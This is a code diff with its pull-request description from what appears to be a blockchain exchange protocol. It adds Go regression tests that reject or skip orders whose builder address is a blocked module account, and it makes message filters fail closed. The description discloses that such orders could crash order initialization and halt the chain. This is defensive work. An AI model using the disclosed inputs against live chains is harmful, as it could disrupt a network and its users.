+					BuilderAddress: authtypes.NewModuleAddress(distrtypes.ModuleName).String(),
+					FeePpm:         10_000,
+				},
+			},
+			expectedErr: "blocked module account",
+		},
+		"Fails with blocked builder address: bonded_tokens_pool": {
+			order: types.Order{
+				OrderId: types.OrderId{
+					ClientId:     0,
+					SubaccountId: constants.Alice_Num0,
+					OrderFlags:   types.OrderIdFlags_LongTerm,
+					ClobPairId:   uint32(0),
+				},
+				Side:         types.Order_SIDE_BUY,
+				Quantums:     12,
+				Subticks:     39,
+				GoodTilOneof: &types.Order_GoodTilBlockTime{GoodTilBlockTime: 10},
+				BuilderCodeParameters: &types.BuilderCodeParameters{
+					BuilderAddress: authtypes.NewModuleAddress(stakingtypes.BondedPoolName).String(),
+					FeePpm:         10_000,
+				},
+			},
+			expectedErr: "blocked module account",
+		},
+		"Fails with blocked builder address: not_bonded_tokens_pool": {
+			order: types.Order{
+				OrderId: types.OrderId{
+					ClientId:     0,
+					SubaccountId: constants.Alice_Num0,
+					OrderFlags:   types.OrderIdFlags_LongTerm,
+					ClobPairId:   uint32(0),
+				},
+				Side:         types.Order_SIDE_BUY,
+				Quantums:     12,
+				Subticks:     39,
+				GoodTilOneof: &types.Order_GoodTilBlockTime{GoodTilBlockTime: 10},
+				BuilderCodeParameters: &types.BuilderCodeParameters{
+					BuilderAddress: authtypes.NewModuleAddress(stakingtypes.NotBondedPoolName).String(),
+					FeePpm:         10_000,
+				},
+			},
+			expectedErr: "blocked module account",
+		},
+		"Fails with blocked builder address: ibc transfer": {
+			order: types.Order{
+				OrderId: types.OrderId{
+					ClientId:     0,
+					SubaccountId: constants.Alice_Num0,
+					OrderFlags:   types.OrderIdFlags_LongTerm,
+					ClobPairId:   uint32(0),
+				},
+				Side:         types.Order_SIDE_BUY,
+				Quantums:     12,
+				Subticks:     39,
+				GoodTilOneof: &types.Order_GoodTilBlockTime{GoodTilBlockTime: 10},
+				BuilderCodeParameters: &types.BuilderCodeParameters{
+					BuilderAddress: authtypes.NewModuleAddress(ibctransfertypes.ModuleName).String(),
+					FeePpm:         10_000,
+				},
+			},
+			expectedErr: "blocked module account",
+		},
+		"Fails with blocked builder address: interchain accounts": {
+			order: types.Order{
+				OrderId: types.OrderId{
+					ClientId:     0,
+					SubaccountId: constants.Alice_Num0,
+					OrderFlags:   types.OrderIdFlags_LongTerm,
+					ClobPairId:   uint32(0),
+				},
+				Side:         types.Order_SIDE_BUY,
+				Quantums:     12,
+				Subticks:     39,
+				GoodTilOneof: &types.Order_GoodTilBlockTime{GoodTilBlockTime: 10},
+				BuilderCodeParameters: &types.BuilderCodeParameters{
+					BuilderAddress: authtypes.NewModuleAddress(icatypes.ModuleName).String(),
+					FeePpm:         10_000,
+				},
+			},
+			expectedErr: "blocked module account",
+		},
+		// --- Positive cases: valid builder addresses ---
+		"Succeeds with valid non-blocked builder address": {
+			order: types.Order{
+				OrderId: types.OrderId{
+					ClientId:     0,
+					SubaccountId: constants.Alice_Num0,
+					OrderFlags:   types.OrderIdFlags_LongTerm,
+					ClobPairId:   uint32(0),
+				},
+				Side:         types.Order_SIDE_BUY,
+				Quantums:     12,
+				Subticks:     39,
+				GoodTilOneof: &types.Order_GoodTilBlockTime{GoodTilBlockTime: 10},
+				BuilderCodeParameters: &types.BuilderCodeParameters{
+					BuilderAddress: constants.Carl_Num0.Owner,
+					FeePpm:         10_000,
+				},
+			},
+			expectedErr: "",
+		},
+		"Succeeds with non-blocked module account (gov) as builder address": {
+			order: types.Order{
+				OrderId: types.OrderId{
+					ClientId:     0,
+					SubaccountId: constants.Alice_Num0,
+					OrderFlags:   types.OrderIdFlags_LongTerm,
+					ClobPairId:   uint32(0),
+				},
+				Side:         types.Order_SIDE_BUY,
+				Quantums:     12,
+				Subticks:     39,
+				GoodTilOneof: &types.Order_GoodTilBlockTime{GoodTilBlockTime: 10},
+				BuilderCodeParameters: &types.BuilderCodeParameters{
+					BuilderAddress: authtypes.NewModuleAddress("gov").String(),
+					FeePpm:         10_000,
+				},
+			},
+			expectedErr: "",
+		},
 	}
 
 	for name, tc := range tests {
@@ -2142,6 +2302,132 @@ func TestInitStatefulOrders(t *testing.T) {
 				len(constants.TestOffchainMessages)*len(expectedPlacedOrders),
 			)
 			memClob.AssertExpectations(t)
+		})
+	}
+}
+
+func TestInitStatefulOrders_SkipsBlockedBuilderAddress(t *testing.T) {
+	feeCollectorAddr := authtypes.NewModuleAddress(authtypes.FeeCollectorName).String()
+
+	// Order with a blocked builder address — should be skipped during init.
+	blockedBuilderOrder := types.Order{
+		OrderId: types.OrderId{
+			SubaccountId: constants.Alice_Num0,
+			ClientId:     99,
+			OrderFlags:   types.OrderIdFlags_LongTerm,
+			ClobPairId:   0,
+		},
+		Side:         types.Order_SIDE_BUY,
+		Quantums:     5,
+		Subticks:     10,
+		GoodTilOneof: &types.Order_GoodTilBlockTime{GoodTilBlockTime: 15},
+		BuilderCodeParameters: &types.BuilderCodeParameters{
+			BuilderAddress: feeCollectorAddr,
+			FeePpm:         10_000,
+		},
+	}
+	// Valid order — should be placed normally.
+	validOrder := constants.LongTermOrder_Alice_Num0_Id2_Clob0_Sell65_Price10_GTBT25
+
+	tests := map[string]struct {
+		statefulOrdersInState []types.Order
+		// Orders expected to actually be placed on the memclob (blocked ones excluded).
+		expectedPlacedOrders []types.Order
+	}{
+		"Skips order with blocked builder address, places valid order": {
+			statefulOrdersInState: []types.Order{blockedBuilderOrder, validOrder},
+			expectedPlacedOrders:  []types.Order{validOrder},
+		},
+		"Skips order with blocked builder address when it is the only order": {
+			statefulOrdersInState: []types.Order{blockedBuilderOrder},
+			expectedPlacedOrders:  []types.Order{},
+		},
+	}
+
+	for name, tc := range tests {
+		t.Run(name, func(t *testing.T) {
+			memClob := &mocks.MemClob{}
+			memClob.On("SetClobKeeper", mock.Anything).Return()
+
+			bankKeeper := &mocks.BankKeeper{}
+			bankKeeper.On("BlockedAddr", mock.MatchedBy(func(addr sdk.AccAddress) bool {
+				return addr.String() == feeCollectorAddr
+			})).Return(true)
+			bankKeeper.On("BlockedAddr", mock.Anything).Return(false)
+
+			indexerEventManager := &mocks.IndexerEventManager{}
+
+			ks := keepertest.NewClobKeepersTestContext(t, memClob, bankKeeper, indexerEventManager)
+
+			ks.MarketMapKeeper.InitGenesis(ks.Ctx, constants.MarketMap_DefaultGenesisState)
+			prices.InitGenesis(ks.Ctx, *ks.PricesKeeper, constants.Prices_DefaultGenesisState)
+			perpetuals.InitGenesis(ks.Ctx, *ks.PerpetualsKeeper, constants.Perpetuals_DefaultGenesisState)
+
+			// Create CLOB pair.
+			memClob.On("CreateOrderbook", constants.ClobPair_Btc).Return()
+			indexerEventManager.On("AddTxnEvent",
+				ks.Ctx,
+				indexerevents.SubtypePerpetualMarket,
+				indexerevents.PerpetualMarketEventVersion,
+				indexer_manager.GetBytes(
+					indexerevents.NewPerpetualMarketCreateEvent(
+						0,
+						0,
+						constants.Perpetuals_DefaultGenesisState.Perpetuals[0].Params.Ticker,
+						constants.Perpetuals_DefaultGenesisState.Perpetuals[0].Params.MarketId,
+						constants.ClobPair_Btc.Status,
+						constants.ClobPair_Btc.QuantumConversionExponent,
+						constants.Perpetuals_DefaultGenesisState.Perpetuals[0].Params.AtomicResolution,
+						constants.ClobPair_Btc.SubticksPerTick,
+						constants.ClobPair_Btc.StepBaseQuantums,
+						constants.Perpetuals_DefaultGenesisState.Perpetuals[0].Params.LiquidityTier,
+						constants.Perpetuals_DefaultGenesisState.Perpetuals[0].Params.MarketType,
+						constants.Perpetuals_DefaultGenesisState.Perpetuals[0].Params.DefaultFundingPpm,
+					),
+				),
+			).Once().Return()
+			_, err := ks.ClobKeeper.CreatePerpetualClobPairAndMemStructs(
+				ks.Ctx,
+				constants.ClobPair_Btc.Id,
+				clobtest.MustPerpetualId(constants.ClobPair_Btc),
+				satypes.BaseQuantums(constants.ClobPair_Btc.StepBaseQuantums),
+				constants.ClobPair_Btc.QuantumConversionExponent,
+				constants.ClobPair_Btc.SubticksPerTick,
+				constants.ClobPair_Btc.Status,
+			)
+			require.NoError(t, err)
+
+			// Write all orders to state.
+			for i, order := range tc.statefulOrdersInState {
+				ks.ClobKeeper.SetLongTermOrderPlacement(ks.Ctx, order, uint32(i))
+				ks.ClobKeeper.SetStatefulOrderCount(ks.Ctx, order.OrderId.SubaccountId, 0)
+			}
+
+			// Only expect PlaceOrder calls for non-blocked orders.
+			for _, order := range tc.expectedPlacedOrders {
+				memClob.On("PlaceOrder", mock.Anything, order).Return(
+					satypes.BaseQuantums(0),
+					types.Success,
+					constants.TestOffchainUpdates,
+					nil,
+				).Once()
+
+				for _, message := range constants.TestOffchainMessages {
+					indexerEventManager.On("SendOffchainData", message).Return().Once()
+				}
+			}
+
+			// Run InitStatefulOrders — must not panic.
+			ks.ClobKeeper.InitStatefulOrders(ks.Ctx)
+
+			// Verify the blocked order was never placed on the memclob.
+			memClob.AssertExpectations(t)
+			indexerEventManager.AssertExpectations(t)
+			indexerEventManager.AssertNumberOfCalls(
+				t,
+				"SendOffchainData",
+				len(constants.TestOffchainMessages)*len(tc.expectedPlacedOrders),
+			)
 		})
 	}
 }

--- a/protocol/x/clob/types/expected_keepers.go
+++ b/protocol/x/clob/types/expected_keepers.go
@@ -203,6 +203,7 @@ type AccountKeeper interface {
 type BankKeeper interface {
 	SpendableCoins(ctx context.Context, addr sdk.AccAddress) sdk.Coins
 	GetBalance(ctx context.Context, addr sdk.AccAddress, denom string) sdk.Coin
+	BlockedAddr(addr sdk.AccAddress) bool
 }
 
 type RewardsKeeper interface {


### PR DESCRIPTION
Make ClobPairIdFilter and SubaccountFilter fail-closed: reject any message type they don't understand instead of silently authorizing it. Reject orders whose builder address is invalid or a blocked module account, and skip such orders in InitStatefulOrders, which otherwise panics during fee transfer.

### Changelist
[Describe or list the changes made in this PR]

### Test Plan
[Describe how this PR was tested (if applicable)]

### Author/Reviewer Checklist
- [ ] If this PR has changes that result in a different app state given the same prior state and transaction list, manually add the `state-breaking` label.
- [ ] If the PR has breaking postgres changes to the indexer add the `indexer-postgres-breaking` label.
- [ ] If this PR isn't state-breaking but has changes that modify behavior in `PrepareProposal` or `ProcessProposal`, manually add the label `proposal-breaking`.
- [ ] If this PR is one of many that implement a specific feature, manually label them all `feature:[feature-name]`.
- [ ] If you wish to for mergify-bot to automatically create a PR to backport your change to a release branch, manually add the label `backport/[branch-name]`.
- [ ] Manually add any of the following labels: `refactor`, `chore`, `bug`.


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

- **Security**
  - Blocked invalid and restricted builder addresses to prevent unsafe orders and potential chain halts.
  - Account filters now reject unsupported message types instead of authorizing them.
- **Bug Fixes**
  - Stateful orders with blocked builders are skipped safely while valid orders continue processing.
  - Added protections for withdrawals, transfers, and bank sends outside approved CLOB messages.
- **Tests**
  - Added regression and end-to-end coverage for blocked addresses, rejected messages, and chain stability.
- **Chores**
  - Increased protocol test and lint timeouts to improve completion reliability.
- **Documentation**
  - Added a debugging proof-of-concept script for reproducing the builder-address issue.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->